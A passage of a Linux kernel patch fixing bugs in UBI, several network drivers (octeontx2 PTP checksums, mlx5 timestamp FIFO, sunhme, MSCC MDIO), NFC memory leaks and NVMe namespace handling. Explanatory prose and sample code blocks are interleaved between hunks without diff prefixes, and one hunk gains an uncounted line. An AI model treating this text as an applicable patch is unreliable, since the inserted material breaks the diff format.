++	spin_unlock(&ubi->wl_lock);
+ 	if (err != -EIO)
+ 		/*
+ 		 * If this is not %-EIO, we have no idea what to do. Scheduling
+@@ -1253,6 +1260,18 @@ int ubi_wl_put_peb(struct ubi_device *ubi, int vol_id, int lnum,
+ retry:
+ 	spin_lock(&ubi->wl_lock);
+ 	e = ubi->lookuptbl[pnum];
++	if (!e) {
++		/*
++		 * This wl entry has already been removed after an error by
++		 * another process (e.g. the wear-leveling worker). Any such
++		 * process (except __erase_worker, which cannot run
++		 * concurrently with ubi_wl_put_peb) also switches ubi to
++		 * read-only mode at the same time, so just ignore this entry.
++		 */
++		spin_unlock(&ubi->wl_lock);
++		up_read(&ubi->fm_protect);
++		return 0;
++	}
+ 	if (e == ubi->move_from) {
+ 		/*
+ 		 * User is putting the physical eraseblock which was selected to
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 26a35ae322d10..cc89cff029e1f 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -513,7 +513,7 @@ static const char * const vsc9959_resource_names[TARGET_MAX] = {
+  * SGMII/QSGMII MAC PCS can be found.
+  */
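++/* Note: DEFINE_RES_MEM_NAMED() takes (start, size, name); 0x10 is a size. */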
+ static const struct resource vsc9959_imdio_res =
+-	DEFINE_RES_MEM_NAMED(0x8030, 0x8040, "imdio");
++	DEFINE_RES_MEM_NAMED(0x8030, 0x10, "imdio");
+ 
+ static const struct reg_field vsc9959_regfields[REGFIELD_MAX] = {
+ 	[ANA_ADVLEARN_VLAN_CHK] = REG_FIELD(ANA_ADVLEARN, 6, 6),
+diff --git a/drivers/net/dsa/ocelot/seville_vsc9953.c b/drivers/net/dsa/ocelot/seville_vsc9953.c
+index 7af33b2c685da..c2863d6d870fb 100644
+--- a/drivers/net/dsa/ocelot/seville_vsc9953.c
++++ b/drivers/net/dsa/ocelot/seville_vsc9953.c
+@@ -923,8 +923,8 @@ static int vsc9953_mdio_bus_alloc(struct ocelot *ocelot)
+ 
+ 	rc = mscc_miim_setup(dev, &bus, "VSC9953 internal MDIO bus",
+ 			     ocelot->targets[GCB],
+-			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK]);
+-
++			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK],
++			     true);
+ 	if (rc) {
+ 		dev_err(dev, "failed to setup MDIO bus\n");
+ 		return rc;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 709fc0114fbd2..0f7345a96965b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -765,7 +765,7 @@ static int otx2_prepare_ipv6_flow(struct ethtool_rx_flow_spec *fsp,
+ 
+ 		/* NPC profile doesn't extract AH/ESP header fields */
+ 		if ((ah_esp_mask->spi & ah_esp_hdr->spi) ||
+-		    (ah_esp_mask->tclass & ah_esp_mask->tclass))
++		    (ah_esp_mask->tclass & ah_esp_hdr->tclass))
+ 			return -EOPNOTSUPP;
+ 
+ 		if (flow_type == AH_V6_FLOW)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index ef10aef3cda02..7045fedfd73a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -10,6 +10,7 @@
+ #include <net/tso.h>
+ #include <linux/bpf.h>
+ #include <linux/bpf_trace.h>
++#include <net/ip6_checksum.h>
+ 
+ #include "otx2_reg.h"
+ #include "otx2_common.h"
+@@ -699,7 +700,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 
+ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 			     int alg, u64 iova, int ptp_offset,
+-			     u64 base_ns, int udp_csum)
++			     u64 base_ns, bool udp_csum_crt)
+ {
+ 	struct nix_sqe_mem_s *mem;
+ 
+@@ -711,7 +712,7 @@ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 
+ 	if (ptp_offset) {
+ 		mem->start_offset = ptp_offset;
+-		mem->udp_csum_crt = udp_csum;
++		mem->udp_csum_crt = !!udp_csum_crt;
+ 		mem->base_ns = base_ns;
+ 		mem->step_type = 1;
+ 	}
+@@ -986,10 +987,11 @@ static bool otx2_validate_network_transport(struct sk_buff *skb)
+ 	return false;
+ }
+ 
+-static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
++static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, bool *udp_csum_crt)
+ {
+ 	struct ethhdr *eth = (struct ethhdr *)(skb->data);
+ 	u16 nix_offload_hlen = 0, inner_vhlen = 0;
++	bool udp_hdr_present = false, is_sync;
+ 	u8 *data = skb->data, *msgtype;
+ 	__be16 proto = eth->h_proto;
+ 	int network_depth = 0;
+@@ -1029,45 +1031,81 @@ static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
+ 		if (!otx2_validate_network_transport(skb))
+ 			return false;
+ 
+-		*udp_csum = 1;
+ 		*offset = nix_offload_hlen + skb_transport_offset(skb) +
+ 			  sizeof(struct udphdr);
++		udp_hdr_present = true;
++
+ 	}
+ 
+ 	msgtype = data + *offset;
+-
+ 	/* Check PTP messageId is SYNC or not */
+-	return (*msgtype & 0xf) == 0;
++	is_sync = !(*msgtype & 0xf);
++	if (is_sync)
++		*udp_csum_crt = udp_hdr_present;
++	else
++		*offset = 0;
++
++	return is_sync;
+ }
+ 
+ static void otx2_set_txtstamp(struct otx2_nic *pfvf, struct sk_buff *skb,
+ 			      struct otx2_snd_queue *sq, int *offset)
+ {
++	struct ethhdr	*eth = (struct ethhdr *)(skb->data);
+ 	struct ptpv2_tstamp *origin_tstamp;
+-	int ptp_offset = 0, udp_csum = 0;
++	bool udp_csum_crt = false;
++	unsigned int udphoff;
+ 	struct timespec64 ts;
++	int ptp_offset = 0;
++	__wsum skb_csum;
+ 	u64 iova;
+ 
+ 	if (unlikely(!skb_shinfo(skb)->gso_size &&
+ 		     (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP))) {
+-		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC)) {
+-			if (otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum)) {
+-				origin_tstamp = (struct ptpv2_tstamp *)
+-						((u8 *)skb->data + ptp_offset +
+-						 PTP_SYNC_SEC_OFFSET);
+-				ts = ns_to_timespec64(pfvf->ptp->tstamp);
+-				origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
+-				origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
+-				origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
+-				/* Point to correction field in PTP packet */
+-				ptp_offset += 8;
++		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC &&
++			     otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum_crt))) {
++			origin_tstamp = (struct ptpv2_tstamp *)
++					((u8 *)skb->data + ptp_offset +
++					 PTP_SYNC_SEC_OFFSET);
++			ts = ns_to_timespec64(pfvf->ptp->tstamp);
++			origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
++			origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
++			origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
++			/* Point to correction field in PTP packet */
++			ptp_offset += 8;
++
++			/* When the user disables hw checksum, the stack calculates the
++			 * csum, but it does not cover the ptp timestamp, which is added
++			 * later. Recalculate the checksum manually to include it.
++			 */
++			if (udp_csum_crt) {
++				struct udphdr *uh = udp_hdr(skb);
++
++				if (skb->ip_summed != CHECKSUM_PARTIAL && uh->check != 0) {
++					udphoff = skb_transport_offset(skb);
++					uh->check = 0;
++					skb_csum = skb_checksum(skb, udphoff, skb->len - udphoff,
++								0);
++					if (ntohs(eth->h_proto) == ETH_P_IPV6)
++						uh->check = csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
++									    &ipv6_hdr(skb)->daddr,
++									    skb->len - udphoff,
++									    ipv6_hdr(skb)->nexthdr,
++									    skb_csum);
++					else
++						uh->check = csum_tcpudp_magic(ip_hdr(skb)->saddr,
++									      ip_hdr(skb)->daddr,
++									      skb->len - udphoff,
++									      IPPROTO_UDP,
++									      skb_csum);
++				}
+ 			}
+ 		} else {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 		}
+ 		iova = sq->timestamps->iova + (sq->head * sizeof(u64));
+ 		otx2_sqe_add_mem(sq, offset, NIX_SENDMEMALG_E_SETTSTMP, iova,
+-				 ptp_offset, pfvf->ptp->base_ns, udp_csum);
++				 ptp_offset, pfvf->ptp->base_ns, udp_csum_crt);
+ 	} else {
+ 		skb_tx_timestamp(skb);
+ 	}
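
The checksum block added above follows the usual kernel recipe for recomputing a UDP checksum after the payload is edited: zero uh->check, sum the UDP header plus payload with skb_checksum(), then fold in the IPv4 or IPv6 pseudo-header. A hedged restatement of that recipe, assuming a linear skb with a valid MAC header (the hunk itself additionally skips packets whose checksumming is offloaded or disabled):

    static void recompute_udp_csum(struct sk_buff *skb)
    {
            unsigned int off = skb_transport_offset(skb);
            struct udphdr *uh = udp_hdr(skb);
            __wsum csum;

            uh->check = 0;  /* must be zero while the sum is computed */
            csum = skb_checksum(skb, off, skb->len - off, 0);
            if (ntohs(eth_hdr(skb)->h_proto) == ETH_P_IPV6)
                    uh->check = csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
                                                &ipv6_hdr(skb)->daddr,
                                                skb->len - off,
                                                IPPROTO_UDP, csum);
            else
                    uh->check = csum_tcpudp_magic(ip_hdr(skb)->saddr,
                                                  ip_hdr(skb)->daddr,
                                                  skb->len - off,
                                                  IPPROTO_UDP, csum);
            /* NB: for UDP an all-zero result must go out as CSUM_MANGLED_0. */
    }
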
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index cdc87ecae5d39..d000236ddbac5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -90,4 +90,8 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
++
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]);
++	if (err)
++		mlx5_core_warn(dev, "Timeout reclaiming external host VFs pages err(%d)\n", err);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index 8469e9c386706..ae75e230170b5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -86,7 +86,19 @@ static bool mlx5e_ptp_ts_cqe_drop(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb
+ 	return (ptpsq->ts_cqe_ctr_mask && (skb_cc != skb_id));
+ }
+ 
+-static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb_id)
++static bool mlx5e_ptp_ts_cqe_ooo(struct mlx5e_ptpsq *ptpsq, u16 skb_id)
++{
++	u16 skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
++	u16 skb_pc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_pc);
++
++	if (PTP_WQE_CTR2IDX(skb_id - skb_cc) >= PTP_WQE_CTR2IDX(skb_pc - skb_cc))
++		return true;
++
++	return false;
++}
++
++static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc,
++					     u16 skb_id, int budget)
+ {
+ 	struct skb_shared_hwtstamps hwts = {};
+ 	struct sk_buff *skb;
+@@ -98,6 +110,7 @@ static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_
+ 		hwts.hwtstamp = mlx5e_skb_cb_get_hwts(skb)->cqe_hwtstamp;
+ 		skb_tstamp_tx(skb, &hwts);
+ 		ptpsq->cq_stats->resync_cqe++;
++		napi_consume_skb(skb, budget);
+ 		skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
+ 	}
+ }
+@@ -118,8 +131,14 @@ static void mlx5e_ptp_handle_ts_cqe(struct mlx5e_ptpsq *ptpsq,
+ 		goto out;
+ 	}
+ 
+-	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id))
+-		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id);
++	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id)) {
++		if (mlx5e_ptp_ts_cqe_ooo(ptpsq, skb_id)) {
++			/* already handled by a previous resync */
++			ptpsq->cq_stats->ooo_cqe_drop++;
++			return;
++		}
++		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id, budget);
++	}
+ 
+ 	skb = mlx5e_skb_fifo_pop(&ptpsq->skb_fifo);
+ 	hwtstamp = mlx5e_cqe_ts_to_ns(sq->ptp_cyc2time, sq->clock, get_cqe_ts(cqe));
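
mlx5e_ptp_ts_cqe_ooo() above is the classic wraparound-safe ring test: with free-running unsigned counters, an id is still outstanding exactly when (id - cc) < (pc - cc) in modular arithmetic. A standalone illustration with plain u16 counters (the driver additionally masks through PTP_WQE_CTR2IDX, which is dropped here):

    #include <assert.h>
    #include <stdbool.h>
    #include <stdint.h>

    /* True when id lies in the half-open window [cc, pc), even if the
     * 16-bit counters have wrapped since cc was captured. */
    static bool id_in_window(uint16_t id, uint16_t cc, uint16_t pc)
    {
            return (uint16_t)(id - cc) < (uint16_t)(pc - cc);
    }

    int main(void)
    {
            assert(id_in_window(5, 3, 10));                /* plain case */
            assert(id_in_window(2, 0xfff0, 0x0010));       /* spans the wrap */
            assert(!id_in_window(0xffef, 0xfff0, 0x0010)); /* already consumed */
            return 0;
    }
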
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 853f312cd7572..1b3a65325ece1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -81,7 +81,7 @@ void mlx5e_free_txqsq_descs(struct mlx5e_txqsq *sq);
+ static inline bool
+ mlx5e_skb_fifo_has_room(struct mlx5e_skb_fifo *fifo)
+ {
+-	return (*fifo->pc - *fifo->cc) < fifo->mask;
++	return (u16)(*fifo->pc - *fifo->cc) < fifo->mask;
+ }
+ 
+ static inline bool
+@@ -297,6 +297,8 @@ void mlx5e_skb_fifo_push(struct mlx5e_skb_fifo *fifo, struct sk_buff *skb)
+ static inline
+ struct sk_buff *mlx5e_skb_fifo_pop(struct mlx5e_skb_fifo *fifo)
+ {
++	WARN_ON_ONCE(*fifo->pc == *fifo->cc);
++
+ 	return *mlx5e_skb_fifo_get(fifo, (*fifo->cc)++);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+index 03c1841970f14..f7f54550a8bbc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+@@ -2121,6 +2121,7 @@ static const struct counter_desc ptp_cq_stats_desc[] = {
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, abort_abs_diff_ns) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_cqe) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_event) },
++	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, ooo_cqe_drop) },
+ };
+ 
+ static const struct counter_desc ptp_rq_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+index 9f781085be471..52a67efafcd37 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+@@ -459,6 +459,7 @@ struct mlx5e_ptp_cq_stats {
+ 	u64 abort_abs_diff_ns;
+ 	u64 resync_cqe;
+ 	u64 resync_event;
++	u64 ooo_cqe_drop;
+ };
+ 
+ struct mlx5e_stats {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index b4e263e8cfb87..235f6f0a70523 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -1043,7 +1043,8 @@ mlx5_eswitch_add_send_to_vport_rule(struct mlx5_eswitch *on_esw,
+ 	dest.vport.flags |= MLX5_FLOW_DEST_VPORT_VHCA_ID;
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+-	if (rep->vport == MLX5_VPORT_UPLINK)
++	if (MLX5_CAP_ESW_FLOWTABLE(on_esw->dev, flow_source) &&
++	    rep->vport == MLX5_VPORT_UPLINK)
+ 		spec->flow_context.flow_source = MLX5_FLOW_CONTEXT_FLOW_SOURCE_LOCAL_VPORT;
+ 
+ 	flow_rule = mlx5_add_flow_rules(on_esw->fdb_table.offloads.slow_fdb,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+index 23361a9ae4fa0..6dc83e871cd76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+@@ -105,6 +105,7 @@ int mlx5_geneve_tlv_option_add(struct mlx5_geneve *geneve, struct geneve_opt *op
+ 		geneve->opt_type = opt->type;
+ 		geneve->obj_id = res;
+ 		geneve->refcount++;
++		res = 0;
+ 	}
+ 
+ unlock:
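
The geneve one-liner is a shared-variable hazard: res carries the firmware object id and doubles as the function's return value, so the success path must reset it after the id is cached, or callers misread the id as an error. A sketch of the pattern with hypothetical helpers:

    struct geneve_state { int obj_id; };
    extern int create_object(void);  /* hypothetical: id >= 0 or -errno */

    static int create_and_cache(struct geneve_state *s)
    {
            int res = create_object();

            if (res < 0)
                    return res;
            s->obj_id = res;
            res = 0;  /* id is cached; the contract is 0 or -errno */
            return res;
    }
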
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 3008e9ce2bbff..20d7662c10fb6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,6 +147,10 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
++	/* For ECPFs, skip waiting for host VF pages until ECPF is destroyed */
++	if (mlx5_core_is_ecpf(dev))
++		return;
++
+ 	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index 1c16548415cdd..b0c7ab74a82ed 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2894,8 +2894,10 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 		goto err_out_clear_quattro;
+ 	}
+ 
+-	hpreg_res = devm_request_region(&pdev->dev, pci_resource_start(pdev, 0),
+-					pci_resource_len(pdev, 0), DRV_NAME);
++	hpreg_res = devm_request_mem_region(&pdev->dev,
++					    pci_resource_start(pdev, 0),
++					    pci_resource_len(pdev, 0),
++					    DRV_NAME);
+ 	if (!hpreg_res) {
+ 		err = -EBUSY;
+ 		dev_err(&pdev->dev, "Cannot obtain PCI resources, aborting.\n");
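
The sunhme fix swaps devm_request_region(), which reserves legacy I/O port space, for devm_request_mem_region(), which reserves MMIO; BAR 0 on this device is memory-mapped, so the old call recorded the claim in the wrong resource tree. A hedged sketch of choosing the primitive from the BAR flags (error handling trimmed, names illustrative):

    static struct resource *claim_bar0(struct pci_dev *pdev)
    {
            resource_size_t start = pci_resource_start(pdev, 0);
            resource_size_t len = pci_resource_len(pdev, 0);

            if (pci_resource_flags(pdev, 0) & IORESOURCE_MEM)
                    return devm_request_mem_region(&pdev->dev, start, len,
                                                   "example");
            return devm_request_region(&pdev->dev, start, len, "example");
    }
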
+diff --git a/drivers/net/mdio/mdio-mscc-miim.c b/drivers/net/mdio/mdio-mscc-miim.c
+index 51f68daac152f..34b87389788bb 100644
+--- a/drivers/net/mdio/mdio-mscc-miim.c
++++ b/drivers/net/mdio/mdio-mscc-miim.c
+@@ -52,6 +52,7 @@ struct mscc_miim_info {
+ struct mscc_miim_dev {
+ 	struct regmap *regs;
+ 	int mii_status_offset;
++	bool ignore_read_errors;
+ 	struct regmap *phy_regs;
+ 	const struct mscc_miim_info *info;
+ 	struct clk *clk;
+@@ -138,7 +139,7 @@ static int mscc_miim_read(struct mii_bus *bus, int mii_id, int regnum)
+ 		goto out;
+ 	}
+ 
+-	if (val & MSCC_MIIM_DATA_ERROR) {
++	if (!miim->ignore_read_errors && !!(val & MSCC_MIIM_DATA_ERROR)) {
+ 		ret = -EIO;
+ 		goto out;
+ 	}
+@@ -218,7 +219,8 @@ static const struct regmap_config mscc_miim_phy_regmap_config = {
+ };
+ 
+ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+-		    struct regmap *mii_regmap, int status_offset)
++		    struct regmap *mii_regmap, int status_offset,
++		    bool ignore_read_errors)
+ {
+ 	struct mscc_miim_dev *miim;
+ 	struct mii_bus *bus;
+@@ -240,6 +242,7 @@ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+ 
+ 	miim->regs = mii_regmap;
+ 	miim->mii_status_offset = status_offset;
++	miim->ignore_read_errors = ignore_read_errors;
+ 
+ 	*pbus = bus;
+ 
+@@ -291,7 +294,7 @@ static int mscc_miim_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy_regmap),
+ 				     "Unable to create phy register regmap\n");
+ 
+-	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0);
++	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0, false);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Unable to setup the MDIO bus\n");
+ 		return ret;
+diff --git a/drivers/nfc/st-nci/se.c b/drivers/nfc/st-nci/se.c
+index ec87dd21e054a..b2f1ced8e6dd2 100644
+--- a/drivers/nfc/st-nci/se.c
++++ b/drivers/nfc/st-nci/se.c
+@@ -672,6 +672,12 @@ int st_nci_se_io(struct nci_dev *ndev, u32 se_idx,
+ 					ST_NCI_EVT_TRANSMIT_DATA, apdu,
+ 					apdu_length);
+ 	default:
++		/* Need to free cb_context here as, at the moment, we can't
++		 * clearly indicate to the caller whether the callback function
++		 * will be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nfc/st21nfca/se.c b/drivers/nfc/st21nfca/se.c
+index df8d27cf2956b..dae288bebcb5a 100644
+--- a/drivers/nfc/st21nfca/se.c
++++ b/drivers/nfc/st21nfca/se.c
+@@ -236,6 +236,12 @@ int st21nfca_hci_se_io(struct nfc_hci_dev *hdev, u32 se_idx,
+ 					ST21NFCA_EVT_TRANSMIT_DATA,
+ 					apdu, apdu_length);
+ 	default:
++		/* Need to free cb_context here as, at the moment, we can't
++		 * clearly indicate to the caller whether the callback function
++		 * will be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5acc9ae225df3..2031fd960549c 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -38,6 +38,7 @@ struct nvme_ns_info {
+ 	bool is_shared;
+ 	bool is_readonly;
+ 	bool is_ready;
++	bool is_removed;
+ };
+ 
+ unsigned int admin_timeout = 60;
+@@ -1439,16 +1440,8 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	error = nvme_submit_sync_cmd(ctrl->admin_q, &c, *id, sizeof(**id));
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+-		goto out_free_id;
++		kfree(*id);
+ 	}
+-
+-	error = NVME_SC_INVALID_NS | NVME_SC_DNR;
+-	if ((*id)->ncap == 0) /* namespace not allocated or attached */
+-		goto out_free_id;
+-	return 0;
+-
+-out_free_id:
+-	kfree(*id);
+ 	return error;
+ }
+ 
+@@ -1462,6 +1455,13 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	ret = nvme_identify_ns(ctrl, info->nsid, &id);
+ 	if (ret)
+ 		return ret;
++
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		return -ENODEV;
++	}
++
+ 	info->anagrpid = id->anagrpid;
+ 	info->is_shared = id->nmic & NVME_NS_NMIC_SHARED;
+ 	info->is_readonly = id->nsattr & NVME_NS_ATTR_RO;
+@@ -4388,6 +4388,7 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ {
+ 	struct nvme_ns_info info = { .nsid = nsid };
+ 	struct nvme_ns *ns;
++	int ret;
+ 
+ 	if (nvme_identify_ns_descs(ctrl, &info))
+ 		return;
+@@ -4404,19 +4405,19 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ 	 * set up a namespace.  If not fall back to the legacy version.
+ 	 */
+ 	if ((ctrl->cap & NVME_CAP_CRMS_CRIMS) ||
+-	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS)) {
+-		if (nvme_ns_info_from_id_cs_indep(ctrl, &info))
+-			return;
+-	} else {
+-		if (nvme_ns_info_from_identify(ctrl, &info))
+-			return;
+-	}
++	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS))
++		ret = nvme_ns_info_from_id_cs_indep(ctrl, &info);
++	else
++		ret = nvme_ns_info_from_identify(ctrl, &info);
++
++	if (info.is_removed)
++		nvme_ns_remove_by_nsid(ctrl, nsid);
+ 
+ 	/*
+ 	 * Ignore the namespace if it is not ready. We will get an AEN once it
+ 	 * becomes ready and restart the scan.
+ 	 */
+-	if (!info.is_ready)
++	if (ret || !info.is_ready)
+ 		return;
+ 
+ 	ns = nvme_find_get_ns(ctrl, nsid);
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index a6e22116e1396..dcac3df8a5f76 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -189,7 +189,8 @@ nvmf_ctlr_matches_baseopts(struct nvme_ctrl *ctrl,
+ 
+ static inline char *nvmf_ctrl_subsysnqn(struct nvme_ctrl *ctrl)
+ {
+-	if (!ctrl->subsys)
++	if (!ctrl->subsys ||
++	    !strcmp(ctrl->opts->subsysnqn, NVME_DISC_SUBSYS_NAME))
+ 		return ctrl->opts->subsysnqn;
+ 	return ctrl->subsys->subnqn;
+ }
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 1dc7c733c7e39..bb80192c16b6b 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2488,6 +2488,10 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 
+ 	len = nvmf_get_address(ctrl, buf, size);
+ 
++	mutex_lock(&queue->queue_lock);
++
++	if (!test_bit(NVME_TCP_Q_LIVE, &queue->flags))
++		goto done;
+ 	ret = kernel_getsockname(queue->sock, (struct sockaddr *)&src_addr);
+ 	if (ret > 0) {
+ 		if (len > 0)
+@@ -2495,6 +2499,8 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 		len += scnprintf(buf + len, size - len, "%ssrc_addr=%pISc\n",
+ 				(len) ? "," : "", &src_addr);
+ 	}
++done:
++	mutex_unlock(&queue->queue_lock);
+ 
+ 	return len;
+ }
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index 05c50408f13b7..fe0f732f6e434 100644
+--- a/drivers/pci/controller/pci-loongson.c
